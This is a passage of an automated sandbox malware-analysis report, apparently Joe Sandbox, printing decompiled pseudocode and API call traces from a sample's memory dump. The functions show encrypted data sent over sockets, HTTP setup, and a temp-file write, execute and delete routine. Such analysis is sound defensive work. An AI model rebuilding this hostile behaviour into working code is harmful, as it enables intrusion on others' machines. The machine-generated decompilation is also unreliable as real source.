    					if(_t120 >=  *((intOrPtr*)(_t98 + 0x18))) {
    						L12:
    						_t101 =  *((intOrPtr*)(_t147 + 8));
    						goto L13;
    					}
    					_t121 =  *( *((intOrPtr*)(_t98 + 0x1c)) + _t120 * 4);
    					_t146 = 0x200;
    					_t99 = _t147 - 0x41c;
    					_t142 = 0;
    					while(1) {
    						_t11 = _t146 + 0x7ffffdfe; // 0x7ffffffe
    						if(_t11 == 0) {
    							break;
    						}
    						_t135 =  *_t121 & 0x0000ffff;
    						if(_t135 == 0) {
    							break;
    						}
    						 *_t99 = _t135;
    						_t99 =  &(_t99[0]);
    						_t121 =  &(_t121[1]);
    						_t146 = _t146 - 1;
    						if(_t146 != 0) {
    							continue;
    						}
    						L9:
    						_t99 = _t99 - 2;
    						_t142 = 0x8007007a;
    						L10:
    						 *_t99 = 0;
    						if(_t142 < 0) {
    							goto L12;
    						}
    						_t101 =  *((intOrPtr*)(_t147 + 8));
    						 *(_t147 - 0x1c) =  *( *((intOrPtr*)( *((intOrPtr*)(_t102 + 8)) + 0x20)) +  *(_t147 - 8) * 4) & 0x0000ffff;
    						goto L14;
    					}
    					__eflags = _t146;
    					if(__eflags != 0) {
    						goto L10;
    					}
    					goto L9;
    					L37:
    				} while (_t143 > 0);
    				L38:
    				_t65 =  *_t101;
    				if( *_t101 != 0) {
    					E0039BB40(_t65);
    					_t149 = _t149 + 4;
    				}
    				_t66 =  *((intOrPtr*)(_t101 + 4));
    				if( *((intOrPtr*)(_t101 + 4)) != 0) {
    					E0039BB40(_t66);
    					_t149 = _t149 + 4;
    				}
    				_t67 =  *((intOrPtr*)(_t101 + 8));
    				if( *((intOrPtr*)(_t101 + 8)) != 0) {
    					E0039BB40(_t67);
    					_t149 = _t149 + 4;
    				}
    				_t68 =  *((intOrPtr*)(_t101 + 0x10));
    				if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
    					E0039BB40(_t68);
    					_t149 = _t149 + 4;
    				}
    				_t69 =  *((intOrPtr*)(_t101 + 0xc));
    				if( *((intOrPtr*)(_t101 + 0xc)) != 0) {
    					E0039BB40(_t69);
    					_t149 = _t149 + 4;
    				}
    				E0039BB40(_t101);
    				_t71 =  *((intOrPtr*)(_t147 - 0x10));
    				 *((intOrPtr*)(_t147 - 0x18)) = 0x3b32ec;
    				if(_t71 != 0) {
    					_push(_t71);
    					L00391CB0();
    				}
    				_t127 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t127 + 0xac))))(0x3b8600);
    				_t106 =  *0x3b8628; // 0x593938
    				 *0x3b8618 =  *0x3b8618 - 1;
    				 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0xc4))))(0x3b8600);
    				return 0;
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003946C9
    • ??2@YAPAXI@Z.MSVCRT ref: 003946DE
    • Sleep.KERNELBASE(000003E8), ref: 003947BF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • ??3@YAXPAX@Z.MSVCRT ref: 00394838
      • Part of subcall function 003B1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B1D73
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 70%
    			E00393070(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				char _v12;
    				char _v20;
    				char _v24;
    				char _v224;
    				char _t52;
    				char _t53;
    				void* _t56;
    				char _t57;
    				char _t58;
    				void* _t60;
    				intOrPtr _t63;
    				void* _t64;
    				intOrPtr _t75;
    				void* _t80;
    				intOrPtr _t82;
    				intOrPtr _t97;
    				intOrPtr _t104;
    				intOrPtr _t109;
    				char _t111;
    				void* _t114;
    				void* _t116;
    
    				_t81 = __ebx;
    				_t111 = 0;
    				_t114 = __ecx;
    				_v24 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				E0039BB30( &_v20);
    				E0039B1E0(__ebx,  &_v20);
    				if(E0039A140( &_v20, _a4) == 0) {
    					L20:
    					_t52 = _v12;
    					if(_t52 != 0) {
    						__imp__#6(_t52);
    					}
    					_t53 = _v8;
    					if(_t53 != 0) {
    						__imp__#6(_t53);
    					}
    					L003926B0(_t81,  &_v20);
    					return _v24;
    				}
    				_push(__ebx);
    				_t56 = E0039DA00( &_v20);
    				_t9 = _t111 + 1; // 0x1
    				_t82 = _t9;
    				if(_t56 == 0) {
    					L18:
    					_v24 = _t82;
    					L19:
    					_pop(_t81);
    					goto L20;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					_t57 = _v12;
    					if(_t57 != 0) {
    						__imp__#6(_t57);
    					}
    					_t58 = _v8;
    					_v12 = 0;
    					if(_t58 != 0) {
    						__imp__#6(_t58);
    					}
    					_v8 = 0;
    					if(E003A0BE0( &_v20, _t111,  &_v12) == 0) {
    						goto L19;
    					} else {
    						_t60 = E0039F2E0( &_v20, _t111,  &_v8);
    						_t122 = _t60;
    						if(_t60 == 0) {
    							goto L19;
    						}
    						E00399090(_t122,  &_v224, 0x81);
    						_t63 =  *0x3b8628; // 0x593938
    						_t116 = _t116 + 8;
    						_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + 0xe0))))(_v12,  &_v224);
    						_t123 = _t64;
    						if(_t64 == 0) {
    							E00399090(_t123,  &_v224, 0x82);
    							_t104 =  *0x3b8628; // 0x593938
    							_t116 = _t116 + 8;
    							_push( &_v224);
    							_push(_v8);
    							if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0xe0))))() != 0) {
    								E00399090(__eflags,  &_v224, 0x83);
    								_t97 =  *0x3b8628; // 0x593938
    								_t116 = _t116 + 8;
    								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0xe0))))(_v8,  &_v224);
    								if(__eflags != 0) {
    									E00399090(__eflags,  &_v224, 0x84);
    									_t75 =  *0x3b8628; // 0x593938
    									_t116 = _t116 + 8;
    									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0xe0))))(_v8,  &_v224);
    									if(__eflags != 0) {
    										E00399090(__eflags,  &_v224, 0xc4);
    										_t109 =  *0x3b8628; // 0x593938
    										_t116 = _t116 + 8;
    										_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0xe0))))(_v8,  &_v224);
    										__eflags = _t80;
    										if(_t80 == 0) {
    											 *((intOrPtr*)(_t114 + 0x3c)) = _t82;
    										}
    									} else {
    										 *((intOrPtr*)(_t114 + 0x38)) = _t82;
    									}
    								} else {
    									 *((intOrPtr*)(_t114 + 0x34)) = _t82;
    								}
    							} else {
    								 *((intOrPtr*)(_t114 + 0x30)) = _t82;
    							}
    						}
    					}
    					_t111 = _t111 + _t82;
    				} while (_t111 < E0039DA00( &_v20));
    				goto L18;
    			}

    APIs
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B1F8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B201
    • SysFreeString.OLEAUT32(?), ref: 003930C8
    • SysFreeString.OLEAUT32(?), ref: 003930DD
      • Part of subcall function 003A0BE0: SysAllocString.OLEAUT32(?), ref: 003A0BF3
      • Part of subcall function 0039F2E0: SysAllocString.OLEAUT32(?), ref: 0039F2F4
    • SysFreeString.OLEAUT32(?), ref: 00393240
    • SysFreeString.OLEAUT32(?), ref: 0039324E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 26%
    			E003A5949(intOrPtr* __eax, void* __eflags, void* _a4, int _a8) {
    				void* _v8;
    				signed int* _v12;
    				char _v32;
    				void _v148;
    				void* __esi;
    				void* _t35;
    				void* _t49;
    				signed int _t50;
    				intOrPtr* _t62;
    				signed int _t64;
    				void* _t74;
    				signed int* _t78;
    
    				_t62 = __eax;
    				_t74 =  *0x3b8538(0x200);
    				_v8 = _t74;
    				_v12 =  *0x3b8538(0x200);
    				_t35 = memset(_t74, 0, 0x200);
    				_t3 =  &_a8; // 0x3a6045
    				 *_t74 = 0x22;
    				__imp__#9( *_t3);
    				 *(_t74 + 9) = _t35;
    				_t7 = _t74 + 0xb; // 0xb
    				memcpy(_t7, _a4, _a8);
    				 *0x3b899c(_t62 + 8, _t74, 0x1fd);
    				_t64 = 0x1d;
    				memcpy( &_v148, _t62 + 8, _t64 << 2);
    				 *0x3b8ab0( &_v148,  &_v32);
    				_t78 = _v12;
    				 *((intOrPtr*)(_v8 + 5)) = _v32;
    				if(E003A3BB7(_t62 + 0xf0, _v8, 0x1fd,  &(_t78[0]), _t62 + 0x110, _t62 + 0x120) == 0) {
    					L6:
    					 *0x3b8540(_v8);
    					 *0x3b8540(_t78);
    					_t49 = 0;
    				} else {
    					_t50 =  *(_t62 + 4) & 0x0000ffff;
    					__imp__#9(_t50);
    					 *_t78 = _t50;
    					_t78[0] = 3;
    					if(E003AFD0B( *_t62, _t78, 0x200) != 0x200 || E003AFB73( *_t62, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003A3BB7(_t62 + 0x100, _v8 + 3, 0x1fd, _t78, _t62 + 0x124, _t62 + 0x134) == 0 ||  *_t78 != 0x28) {
    						goto L6;
    					} else {
    						 *0x3b8540(_v8);
    						 *0x3b8540(_t78);
    						_t49 = 1;
    					}
    				}
    				return _t49;
    			}

    APIs
    • memset.MSVCRT ref: 003A5979
    • htons.WS2_32(E`:), ref: 003A5987
    • memcpy.MSVCRT ref: 003A599B
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A5A0A
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 75%
    			E003B0A40(intOrPtr* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
    				char _v8;
    				char _v12;
    				char _v212;
    				void* __ebx;
    				void* _t34;
    				void* _t40;
    				intOrPtr _t47;
    				signed int _t51;
    				intOrPtr _t52;
    				intOrPtr* _t53;
    				intOrPtr _t59;
    				intOrPtr _t61;
    				intOrPtr _t68;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				void* _t73;
    				intOrPtr _t74;
    				signed int _t76;
    				void* _t77;
    				void* _t78;
    
    				_t73 = __esi;
    				_t71 = __edi;
    				_t51 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				E00399090(__eflags,  &_v212, 0xcf);
    				_t34 = E00393C70( &_v12,  &_v212,  &_v8,  &_v12);
    				_t78 = _t77 + 0x14;
    				_t81 = _t34;
    				if(_t34 != 0) {
    					L2:
    					if(_v8 == _t51) {
    						L19:
    						return _t51;
    					}
    					if(_v12 <= 4) {
    						L17:
    						_t36 = _v8;
    						if(_v8 != 0) {
    							E0039BB40(_t36);
    						}
    						goto L19;
    					}
    					_push(0x34);
    					L0039A47E();
    					_t78 = _t78 + 4;
    					if(_t34 == _t51) {
    						goto L17;
    					}
    					_push(_t73);
    					_t74 = E003970B0(_t34);
    					if(_t74 == _t51) {
    						L16:
    						goto L17;
    					}
    					_push(_t71);
    					_t40 = E003B09A0(_a4, _t74,  &_v212, _v8, _v12);
    					_t78 = _t78 + 0x14;
    					if(_t40 == 0) {
    						L14:
    						E0039CB70(_t51, _t74, _t71);
    						_push(_t74);
    						L00391CB0();
    						_t78 = _t78 + 4;
    						L15:
    						goto L16;
    					}
    					_t71 = _a8;
    					if( *((intOrPtr*)(_t74 + 0x10)) <=  *((intOrPtr*)( *_t71 + 0x10))) {
    						goto L14;
    					}
    					_t68 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xac))))(0x3b8594);
    					_t52 =  *_t71;
    					if(_t52 != 0) {
    						E0039CB70(_t52, _t52, _t71);
    						_push(_t52);
    						L00391CB0();
    						_t78 = _t78 + 4;
    					}
    					 *_t71 = _t74;
    					_t59 =  *0x3b8628; // 0x593938
    					_t69 =  *((intOrPtr*)(_t59 + 0xc4));
    					 *_t69(0x3b8594);
    					_t76 = 0;
    					if( *((intOrPtr*)( *_t71 + 0x18)) <= 0) {
    						L13:
    						_t51 = 1;
    						goto L15;
    					} else {
    						_t53 = __imp___time64;
    						do {
    							_t47 =  *_t53(0);
    							_t61 =  *((intOrPtr*)( *_t71 + 0x28));
    							 *((intOrPtr*)(_t61 + _t76 * 8)) = _t47;
    							 *((intOrPtr*)(_t61 + 4 + _t76 * 8)) = _t69;
    							_t69 =  *_t71;
    							_t76 = _t76 + 1;
    							_t78 = _t78 + 4;
    						} while (_t76 <  *((intOrPtr*)(_t69 + 0x18)));
    						goto L13;
    					}
    				}
    				E00399090(_t81,  &_v212, 0x10);
    				_t34 = E00393C70( &_v212,  &_v212,  &_v8,  &_v12);
    				_t78 = _t78 + 0x14;
    				if(_t34 == 0) {
    					goto L17;
    				}
    				goto L2;
    			}

    APIs
      • Part of subcall function 00393C70: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 00393C70: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
    • ??2@YAPAXI@Z.MSVCRT ref: 003B0AC0
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0B35
    • _time64.MSVCRT ref: 003B0B63
      • Part of subcall function 0039CB70: SysFreeString.OLEAUT32(?), ref: 0039CB81
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0B8B
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 94%
    			E0039F850(void* __ebx, void* __ecx) {
    				intOrPtr _t29;
    				intOrPtr _t34;
    				void* _t47;
    				intOrPtr _t51;
    				intOrPtr _t55;
    				void* _t57;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				void* _t61;
    				intOrPtr _t62;
    				void* _t63;
    
    				_t47 = __ebx;
    				_t61 = __ecx;
    				_t19 =  *((intOrPtr*)(__ecx + 0x14));
    				if( *((intOrPtr*)(__ecx + 0x14)) != 0) {
    					E0039BB40(_t19);
    					_t63 = _t63 + 4;
    				}
    				_t20 =  *((intOrPtr*)(_t61 + 0x28));
    				if( *((intOrPtr*)(_t61 + 0x28)) != 0) {
    					E0039BB40(_t20);
    					_t63 = _t63 + 4;
    				}
    				_t21 =  *((intOrPtr*)(_t61 + 0x1c));
    				if( *((intOrPtr*)(_t61 + 0x1c)) != 0) {
    					E0039BB40(_t21);
    					_t63 = _t63 + 4;
    				}
    				_t22 =  *((intOrPtr*)(_t61 + 0x2c));
    				if( *((intOrPtr*)(_t61 + 0x2c)) != 0) {
    					E0039BB40(_t22);
    					_t63 = _t63 + 4;
    				}
    				_t23 =  *((intOrPtr*)(_t61 + 0x20));
    				if( *((intOrPtr*)(_t61 + 0x20)) != 0) {
    					E0039BB40(_t23);
    					_t63 = _t63 + 4;
    				}
    				_t24 =  *((intOrPtr*)(_t61 + 0x18));
    				if( *((intOrPtr*)(_t61 + 0x18)) != 0) {
    					E0039BB40(_t24);
    					_t63 = _t63 + 4;
    				}
    				E003916B0(_t61 + 0x30);
    				_t26 =  *((intOrPtr*)(_t61 + 0x64));
    				if( *((intOrPtr*)(_t61 + 0x64)) != 0) {
    					E0039BB40(_t26);
    					_t63 = _t63 + 4;
    				}
    				_t27 =  *((intOrPtr*)(_t61 + 0x5c));
    				if( *((intOrPtr*)(_t61 + 0x5c)) != 0) {
    					E0039BB40(_t27);
    					_t63 = _t63 + 4;
    				}
    				_t28 =  *((intOrPtr*)(_t61 + 0x60));
    				if( *((intOrPtr*)(_t61 + 0x60)) != 0) {
    					E0039BB40(_t28);
    					_t63 = _t63 + 4;
    				}
    				_t29 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t29 + 0xac))))(0x3b8594, _t57);
    				_t58 =  *((intOrPtr*)(_t61 + 4));
    				if(_t58 != 0) {
    					E00396E10(_t47, _t58);
    					_push(_t58);
    					L00391CB0();
    					_t63 = _t63 + 4;
    				}
    				_t59 =  *((intOrPtr*)(_t61 + 0xc));
    				if(_t59 != 0) {
    					E00396730(_t59);
    					_push(_t59);
    					L00391CB0();
    					_t63 = _t63 + 4;
    				}
    				_t55 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0xc4))))(0x3b8594);
    				 *((intOrPtr*)(_t61 + 0x4fc)) = 0x3b32ec;
    				_t62 =  *((intOrPtr*)(_t61 + 0x504));
    				if(_t62 != 0) {
    					_push(_t62);
    					L00391CB0();
    				}
    				_t51 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xac))))(0x3b8600);
    				_t34 =  *0x3b8628; // 0x593938
    				 *0x3b8618 =  *0x3b8618 - 1;
    				return  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc4))))(0x3b8600);
    			}

    APIs
      • Part of subcall function 003916B0: memset.MSVCRT ref: 003916EE
    • ??3@YAXPAX@Z.MSVCRT ref: 0039F955
      • Part of subcall function 00396E10: ??3@YAXPAX@Z.MSVCRT ref: 00396E42
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • ??3@YAXPAX@Z.MSVCRT ref: 0039F90D
    • ??3@YAXPAX@Z.MSVCRT ref: 0039F924
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 94%
    			E003B04A0(void* __ecx, intOrPtr* _a4, signed int _a8) {
    				void _v1022;
    				short _v1024;
    				char _v1028;
    				char _v1540;
    				char _v2052;
    				long _t21;
    				intOrPtr* _t22;
    				intOrPtr _t34;
    				intOrPtr* _t41;
    				void* _t48;
    				void* _t54;
    
    				memset( &_v2052, 0, 0x800);
    				_t21 = GetTempPathA(0x104,  &_v2052);
    				_t41 = _a4;
    				_t34 =  *_t41;
    				 *((intOrPtr*)(_t54 + _t21 - 0x800)) = 0x61676571;
    				_t22 =  &_v1540;
    				if(_t34 != 0) {
    					_t48 = _t41 - _t22;
    					do {
    						 *_t22 = _t34;
    						_t34 =  *((intOrPtr*)(_t48 + _t22 + 1));
    						_t22 = _t22 + 1;
    					} while (_t34 != 0);
    				}
    				asm("sbb edx, edx");
    				 *_t22 = ( ~_a8 & 0xffff0000) + 0x5d385b20;
    				_t11 =  &_v2052; // 0x61676571
    				E003B03D0(_t11,  &_v1540, _t22 -  &_v1540 + 4);
    				_v1024 = 0x696e;
    				_v1028 = 0x69676572;
    				_t14 =  &_v2052; // 0x61676571
    				_t16 =  &_v1028; // 0x69676572
    				memcpy( &_v1022, _t14, 0x80 << 2);
    				E003B0420(_t16);
    				_t18 =  &_v2052; // 0x61676571
    				return DeleteFileA(_t18);
    			}

    APIs
    • memset.MSVCRT ref: 003B04BC
    • GetTempPathA.KERNEL32(00000104,?), ref: 003B04D0
      • Part of subcall function 003B03D0: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,10000080,00000000), ref: 003B03EA
      • Part of subcall function 003B03D0: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 003B0401
      • Part of subcall function 003B03D0: CloseHandle.KERNEL32(00000000), ref: 003B0408
      • Part of subcall function 003B0420: memset.MSVCRT ref: 003B042F
      • Part of subcall function 003B0420: CreateProcessA.KERNEL32(00000000,003B0568,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 003B0468
      • Part of subcall function 003B0420: WaitForSingleObject.KERNEL32(?,00002710), ref: 003B047E
      • Part of subcall function 003B0420: CloseHandle.KERNEL32(?), ref: 003B048E
      • Part of subcall function 003B0420: CloseHandle.KERNEL32(?), ref: 003B0494
    • DeleteFileA.KERNEL32(qega,regi,qega,?,?), ref: 003B056F
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 26%
    			E003A43AE(intOrPtr* _a4, void* _a8, void* _a12) {
    				void* _v8;
    				void* _v12;
    				void _v32;
    				void _v148;
    				signed int _t44;
    				void* _t53;
    				void* _t63;
    				signed int _t64;
    				signed short _t77;
    				int _t79;
    				signed int _t80;
    				signed int* _t88;
    				signed int _t93;
    				void* _t95;
    				intOrPtr* _t102;
    				void* _t103;
    				void* _t108;
    				void* _t109;
    				void* _t110;
    
    				_t95 =  *0x3b8538(0x200);
    				_v12 = _t95;
    				_v8 =  *0x3b8538(0x200);
    				memset(_t95, 0, 0x1fd);
    				 *_t95 = 5;
    				if(_a12 == 0) {
    					_t44 = 0;
    				} else {
    					_t77 =  *(_a4 + 0x138) & 0x0000ffff;
    					__imp__#9(_t77);
    					_t44 = _t77 & 0x0000ffff;
    				}
    				_t108 = _a8;
    				_push(0x1fd);
    				 *(_t95 + 3) = _t44;
    				_push(_t95);
    				if(_t108 == 0) {
    					_t108 = _a4 + 8;
    				}
    				 *0x3b899c(_t108);
    				_t80 = 0x1d;
    				memcpy( &_v148, _t108, _t80 << 2);
    				_t109 =  *0x3b8538(0x14);
    				_a12 = _t109;
    				 *0x3b8ab0( &_v148, _t109);
    				memcpy( &_v32, _t109, 0 << 2);
    				 *0x3b8540(_a12, 5);
    				_t110 = _v12;
    				 *((intOrPtr*)(_t110 + 5)) = _v32;
    				_t53 = _a8;
    				if(_t53 == 0) {
    					memset(_v8, 0, 0x200);
    					_t102 = _a4;
    					_t32 = _t102 + 0x120; // 0x120
    					_t33 = _t102 + 0x110; // 0x110
    					_t35 = _t102 + 0xf0; // 0xf0
    					if(E003A3BB7(_t35, _t110, 0x1fd, _v8 + 3, _t33, _t32) == 0) {
    						goto L12;
    					} else {
    						_t79 = 0x200;
    						goto L11;
    					}
    				} else {
    					_t103 = _v8;
    					_t22 = _t53 + 0x118; // 0x118
    					_t23 = _t53 + 0x108; // 0x108
    					if(E003A3BB7(_t53 + 0xe8, _t110, 0x1fd, _t103, _t23, _t22) == 0) {
    						L13:
    						 *0x3b8540(_t110);
    						 *0x3b8540(_t103);
    						_t63 = 0;
    					} else {
    						_t71 = _a4;
    						_t25 = _t71 + 0x120; // 0x120
    						_t26 = _t71 + 0x110; // 0x110
    						if(E003A3BB7(_a4 + 0xf0, _t103, 0x1fd, _t110, _t26, _t25) == 0) {
    							goto L13;
    						} else {
    							_t79 = 0x200;
    							memset(_t103, 0, 0x200);
    							_t93 = 0x7f;
    							memcpy(_t103 + 3, _t110, _t93 << 2);
    							asm("movsb");
    							_t102 = _a4;
    							_t110 = _v12;
    							L11:
    							_t64 =  *(_t102 + 4) & 0x0000ffff;
    							__imp__#9(_t64);
    							_t88 = _v8;
    							 *_t88 = _t64;
    							_t88[0] = 3;
    							if(E003AFD0B( *_t102, _t88, _t79) == _t79) {
    								 *0x3b8540(_t110);
    								 *0x3b8540(_v8);
    								_t63 = 1;
    							} else {
    								L12:
    								_t103 = _v8;
    								goto L13;
    							}
    						}
    					}
    				}
    				return _t63;
    			}

    APIs
    • memset.MSVCRT ref: 003A43DC
    • htons.WS2_32(?), ref: 003A43F8
    • memset.MSVCRT ref: 003A44C5
    • memset.MSVCRT ref: 003A44E8
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A4524
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
